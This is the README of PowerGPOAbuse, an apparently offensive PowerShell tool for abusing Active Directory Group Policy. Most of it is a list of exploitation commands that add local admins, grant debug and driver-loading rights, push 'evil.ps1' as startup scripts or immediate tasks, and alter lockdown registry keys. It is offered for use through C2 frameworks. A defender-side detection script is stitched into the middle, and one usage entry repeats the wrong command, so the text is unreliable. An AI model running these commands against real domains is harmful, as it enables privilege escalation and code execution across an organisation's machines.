rootSySdk/PowerGPOAbuse

PowerGPOAbuse

PowerShell version of SharpGPOAbuse for those who can't compile it or whose C2 can't execute a .NET assembly directly from memory. Heavily inspired by the original C# version and the amazing PowerView.

Usage

Import the script

Recon

  • These functions are designed to support the exploitation functions, but they can also be used for quick recon. They do not aim to replace PowerView's equivalents.

  • List users PS> Get-DomainUser

  • List groups PS> Get-DomainGroup

  • List GPOs PS> Get-DomainGPO

  • List OUs PS> Get-DomainOU

  • List DCs PS> Find-DomainController

Exploitation

  • Changing GPO status PS> Set-DomainGPOStatus -GPOIdentity "SuperSecureGPO" -Status "AllSettingsDisabled"

  • Creating a new GPLink PS> New-DomainGPLink -GPOIdentity "SuperSecureGPO" -OUIdentity "SecureUsers" -Status "LinkEnabled"

  • Changing the status of a GPLink PS> New-DomainGPLink -GPOIdentity "SuperSecureGPO" -OUIdentity "SecureUsers" -Status "LinkEnabled"

  • Adding a user to a group PS> Add-GPOGroupMember -Member 'Bobby' -GPOIdentity 'SuperSecureGPO'

  • Assign a new right PS> Add-GPOUserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'

  • Adding a new Computer/User script PS> Add-GPOStartupScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' -Scope Computer/User

  • Create a new Computer/User immediate task PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User

  • Adding a new registry key PS> Add-GPORegistryPreference -GPOIdentity SuperSecureGPO -RegistryPath "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -RegistryKey "__PSLockdownPolicy" -RegistryValue "4" -RegistryValueType String -RegistryAction Create

  • Create a new GPO PS> New-DomainGPO -DisplayName SuperSecureGPO -Domain testlab.local

  • Delete a GPO PS> Remove-DomainGPO -GPOIdentity SuperSecureGPO -RemoveFile
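
A defender-side check for the settings the commands above write, as an added example that is not part of PowerGPOAbuse: it walks a copy of the SYSVOL Policies tree and reports user-rights assignments, group membership entries, immediate tasks, registry preferences and script entries per GPO. The function name, the watched rights and the sample tree are assumptions made for this example; the file and section names are those of standard Group Policy storage.

```powershell
# Added defensive example; function name and sample data are hypothetical/constructed.
function Find-GpoSettingArtifact {
    param([Parameter(Mandatory)][string]$PoliciesPath)
    $watched = 'SeDebugPrivilege', 'SeLoadDriverPrivilege'   # rights named in the usage list
    # -Force so files carrying the hidden attribute are not skipped
    foreach ($file in Get-ChildItem -LiteralPath $PoliciesPath -Recurse -File -Force) {
        $hits = @()
        if ($file.Name -eq 'GptTmpl.inf') {
            $section = ''   # security template: track the current [section]
            foreach ($line in Get-Content -LiteralPath $file.FullName) {
                if ($line -match '^\[(.+)\]') { $section = $Matches[1] }
                elseif ($section -eq 'Privilege Rights' -and ($line -split '=')[0].Trim() -in $watched) {
                    $hits += "user right: $($line.Trim())"
                }
                elseif ($section -eq 'Group Membership' -and $line -match '__Members\s*=\s*\S') {
                    $hits += "group membership: $($line.Trim())"
                }
            }
        }
        elseif ($file.Name -eq 'ScheduledTasks.xml') {
            $xml = [xml](Get-Content -LiteralPath $file.FullName -Raw)
            foreach ($t in $xml.SelectNodes('//ImmediateTaskV2')) {
                $hits += "immediate task: $($t.GetAttribute('name'))"
            }
        }
        elseif ($file.Name -eq 'Registry.xml') {
            $xml = [xml](Get-Content -LiteralPath $file.FullName -Raw)
            foreach ($p in $xml.SelectNodes('//Registry/Properties')) {
                $hits += "registry preference: $($p.GetAttribute('key'))\$($p.GetAttribute('name'))"
            }
        }
        elseif ($file.Name -in 'scripts.ini', 'psscripts.ini') {
            foreach ($line in Get-Content -LiteralPath $file.FullName) {
                if ($line -match '^\d+CmdLine=') { $hits += "script entry: $line" }
            }
        }
        $gpoId = [regex]::Match($file.FullName, '\{[0-9A-Fa-f-]{36}\}').Value
        foreach ($h in $hits) { [pscustomobject]@{ Gpo = $gpoId; File = $file.Name; Finding = $h } }
    }
}

# Constructed sample tree so the function runs offline; use a SYSVOL Policies copy in practice.
$root = Join-Path ([IO.Path]::GetTempPath()) 'gpo-sample'
$gpo  = Join-Path $root '{11111111-2222-3333-4444-555555555555}\Machine'
$sec  = New-Item -ItemType Directory -Force -Path (Join-Path $gpo 'Microsoft\Windows NT\SecEdit')
$task = New-Item -ItemType Directory -Force -Path (Join-Path $gpo 'Preferences\ScheduledTasks')
Set-Content -LiteralPath (Join-Path $sec.FullName 'GptTmpl.inf') -Value '[Privilege Rights]', 'SeDebugPrivilege = *S-1-5-21-1-2-3-1105'
Set-Content -LiteralPath (Join-Path $task.FullName 'ScheduledTasks.xml') -Value '<ScheduledTasks><ImmediateTaskV2 name="sample-task" /></ScheduledTasks>'
Find-GpoSettingArtifact -PoliciesPath $root | Format-Table -AutoSize
```

Comparing the output between two dated SYSVOL copies narrows the findings to settings that changed in that window.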

Aliases

  • Add-LocalAdmin -> Add-GPOGroupMember

  • Add-UserRights -> Add-GPOUserRights

  • Add-Script -> Add-GPOStartupScript

  • Add-Task -> Add-GPOImmediateTask

  • Add-RegistryValue -> Add-GPORegistryPreference

Future changes

Reverse functions, Backup Operator weaponization, stability, optimisation and new exploitation functions.

If you find any bugs, have ideas to improve the script, or have any feedback, feel free to raise an issue or propose a pull request!
